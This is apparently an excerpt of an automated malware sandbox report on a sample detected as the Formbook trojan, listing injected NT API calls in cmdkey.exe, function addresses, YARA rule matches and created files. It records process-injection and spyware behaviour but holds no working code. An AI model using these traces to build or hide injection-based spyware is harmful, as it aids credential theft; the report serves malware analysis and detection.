        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_038F2C50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2BE0 NtQueryVirtualMemory,5_2_038F2BE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B20 NtQueryInformationProcess,5_2_038F2B20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2AA0 NtQueryInformationFile,5_2_038F2AA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F29D0 NtWaitForSingleObject,5_2_038F29D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2FB0 NtSetValueKey,5_2_038F2FB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2F30 NtOpenDirectoryObject,5_2_038F2F30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2E80 NtCreateProcessEx,5_2_038F2E80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2EB0 NtProtectVirtualMemory,5_2_038F2EB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2EC0 NtQuerySection,5_2_038F2EC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2DC0 NtAdjustPrivilegesToken,5_2_038F2DC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2D50 NtWriteVirtualMemory,5_2_038F2D50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F3C90 NtOpenThread,5_2_038F3C90
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2CD0 NtEnumerateKey,5_2_038F2CD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2C10 NtOpenProcess,5_2_038F2C10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2C20 NtSetInformationFile,5_2_038F2C20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F3C30 NtOpenProcessToken,5_2_038F3C30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029370 NtReadFile,5_2_03029370
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029200 NtCreateFile,5_2_03029200
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029670 NtAllocateVirtualMemory,5_2_03029670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029500 NtClose,5_2_03029500
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029460 NtDeleteFile,5_2_03029460
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368F36F NtReadVirtualMemory,5_2_0368F36F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030E2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,3_2_004030E2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_004047F90_2_004047F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00406A930_2_00406A93
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_004062BC0_2_004062BC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_004047F93_2_004047F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_00406A933_2_00406A93
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_004062BC3_2_004062BC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339013803_2_33901380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391E3103_2_3391E310
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CF3303_2_339CF330
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FD2EC3_2_338FD2EC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338D22453_2_338D2245
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C124C3_2_339C124C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339151C03_2_339151C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392B1E03_2_3392B1E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D010E3_2_339D010E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF1133_2_338FF113
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AD1303_2_339AD130
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3395717A3_2_3395717A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3394508C3_2_3394508C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339000A03_2_339000A0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391B0D03_2_3391B0D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C70F13_2_339C70F1
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BE0763_2_339BE076
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338D17073_2_338D1707
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C67573_2_339C6757
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339127603_2_33912760
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391A7603_2_3391A760
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339106803_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CA6C03_2_339CA6C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CF6F63_2_339CF6F6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390C6E03_2_3390C6E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339836EC3_2_339836EC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392C6003_2_3392C600
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AD62C3_2_339AD62C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BD6463_2_339BD646
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339346703_2_33934670
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CF5C93_2_339CF5C9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C75C63_2_339C75C6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339DA5263_2_339DA526
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397D4803_2_3397D480
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339104453_2_33910445
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33984BC03_2_33984BC0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910B103_2_33910B10
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3394DB193_2_3394DB19
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CFB2E3_2_339CFB2E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CFA893_2_339CFA89
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392FAA03_2_3392FAA0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CCA133_2_339CCA13
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CEA5B3_2_339CEA5B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390E9A03_2_3390E9A0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CE9A63_2_339CE9A6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339559C03_2_339559C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338D99E83_2_338D99E8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339268823_2_33926882
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339898B23_2_339898B2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C18DA3_2_339C18DA
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339128C03_2_339128C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C78F33_2_339C78F3
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E8103_2_3393E810
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339138003_2_33913800
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339B08353_2_339B0835
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339198703_2_33919870
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392B8703_2_3392B870
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F68683_2_338F6868
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CF8723_2_339CF872
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CEFBF3_2_339CEFBF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C1FC63_2_339C1FC6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33916FE03_2_33916FE0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391CF003_2_3391CF00
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CFF633_2_339CFF63
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33911EB23_2_33911EB2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C0EAD3_2_339C0EAD
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C9ED23_2_339C9ED2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33902EE83_2_33902EE8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33930E503_2_33930E50
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33952E483_2_33952E48
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339B0E6D3_2_339B0E6D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33922DB03_2_33922DB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038B13805_2_038B1380
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038CE3105_2_038CE310
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397F3305_2_0397F330
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038AD2EC5_2_038AD2EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038822455_2_03882245
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397124C5_2_0397124C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C51C05_2_038C51C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038DB1E05_2_038DB1E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0398010E5_2_0398010E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038AF1135_2_038AF113
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0395D1305_2_0395D130
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390717A5_2_0390717A
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F508C5_2_038F508C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038B00A05_2_038B00A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038CB0D05_2_038CB0D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039770F15_2_039770F1
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0396E0765_2_0396E076
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039767575_2_03976757
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C27605_2_038C2760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038CA7605_2_038CA760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C06805_2_038C0680
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397A6C05_2_0397A6C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397F6F65_2_0397F6F6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038BC6E05_2_038BC6E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039336EC5_2_039336EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038DC6005_2_038DC600
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0395D62C5_2_0395D62C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0396D6465_2_0396D646
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038E46705_2_038E4670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039775C65_2_039775C6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397F5C95_2_0397F5C9
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0398A5265_2_0398A526
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0392D4805_2_0392D480
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C04455_2_038C0445
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03934BC05_2_03934BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038FDB195_2_038FDB19
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C0B105_2_038C0B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397FB2E5_2_0397FB2E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397FA895_2_0397FA89
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038DFAA05_2_038DFAA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397CA135_2_0397CA13
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397EA5B5_2_0397EA5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038BE9A05_2_038BE9A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397E9A65_2_0397E9A6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039059C05_2_039059C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038899E85_2_038899E8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038D68825_2_038D6882
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039398B25_2_039398B2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C28C05_2_038C28C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039718DA5_2_039718DA
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039778F35_2_039778F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C38005_2_038C3800
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038EE8105_2_038EE810
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039608355_2_03960835
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038A68685_2_038A6868
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039358705_2_03935870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397F8725_2_0397F872
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C98705_2_038C9870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038DB8705_2_038DB870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397EFBF5_2_0397EFBF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03971FC65_2_03971FC6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C6FE05_2_038C6FE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038CCF005_2_038CCF00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397FF635_2_0397FF63
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03970EAD5_2_03970EAD
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C1EB25_2_038C1EB2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03979ED25_2_03979ED2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038B2EE85_2_038B2EE8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03902E485_2_03902E48
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038E0E505_2_038E0E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03960E6D5_2_03960E6D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038D2DB05_2_038D2DB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C9DD05_2_038C9DD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0395FDF45_2_0395FDF4
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038BAD005_2_038BAD00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397FD275_2_0397FD27
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03977D4C5_2_03977D4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C0D695_2_038C0D69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03959C985_2_03959C98
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038D8CDF5_2_038D8CDF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038DFCE05_2_038DFCE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0398ACEB5_2_0398ACEB
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03947CE85_2_03947CE8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038B0C125_2_038B0C12
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038CAC205_2_038CAC20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0396EC4C5_2_0396EC4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C3C605_2_038C3C60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0397EC605_2_0397EC60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03976C695_2_03976C69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03011DC05_2_03011DC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_030011225_2_03001122
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0300B1885_2_0300B188
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_030136705_2_03013670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_030154905_2_03015490
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0302BB305_2_0302BB30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0300CF305_2_0300CF30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0300AFB05_2_0300AFB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0300CD0C5_2_0300CD0C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0300CD105_2_0300CD10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368E3D55_2_0368E3D5
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368E4F35_2_0368E4F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368D8F85_2_0368D8F8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0368E88C5_2_0368E88C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: String function: 004029FD appears 48 times
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: String function: 33957BE4 appears 78 times
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: String function: 338FB910 appears 231 times
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: String function: 3398EF10 appears 80 times
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: String function: 33945050 appears 31 times
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: String function: 3397E692 appears 73 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 03907BE4 appears 91 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0393EF10 appears 105 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 038AB910 appears 268 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 038F5050 appears 36 times
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: String function: 0392E692 appears 86 times
        Source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.000000000322B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecmdkey.exej% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000003.17112324273.0000000033857000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000003.17166111623.0000000003207000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecmdkey.exej% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000002.17223941373.0000000033BA0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exe, 00000003.00000003.17108712152.00000000336A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ImBm40hNZ2.exe
        Source: ImBm40hNZ2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/12@18/14
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_004042BD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042BD
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile created: C:\Program Files (x86)\sorteringsordenens.lnkJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile created: C:\Users\user\AppData\Local\Temp\nsq14BA.tmpJump to behavior
        Source: ImBm40hNZ2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: cmdkey.exe, 00000005.00000002.21528309746.00000000080A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
